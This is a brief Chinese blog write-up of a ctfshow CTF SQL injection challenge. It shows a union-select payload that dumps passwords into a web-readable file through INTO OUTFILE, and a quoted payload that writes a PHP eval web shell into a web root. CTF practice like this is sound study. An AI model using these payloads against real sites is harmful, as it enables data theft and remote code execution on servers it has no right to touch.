最近做到一道题,是ctfshow平台的,题目如下
在这里插入图片描述
没有过滤,但如果返回结果中没有ASCII码在 00-7f 范围的,才会查询成功。我以为要用什么方法绕过,但看了师傅们的做法才知道,还可以把查询结果写到到一个文件里,而在linux服务器下web文件夹的目录为/var/www/html/
(看来我知道的还是太少了๐·°(৹˃̵﹏˂̵৹)°·๐)
所以payload为

1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/123.txt'-- 

访问123.txt,得到flag
在这里插入图片描述
这时突然想到,如果写入的是一句话木马,那岂不是可以拿到webshell,赶集搜了下,果然,可以通过1'union select "<?php @eval($_POST['cmd']);?>" into outfile 'C:/phpStudy/WWW/shell.php'--+来写入一句话木马,以及还有一些其他的写入方式,可以看这篇文章。需要注意的是数据库必须没有配置-secure-file-priv
学到了,赶紧写下来,改天有空了我本地试试。

最后修改:2023 年 12 月 15 日
如果觉得我的文章对你有用,请随意赞赏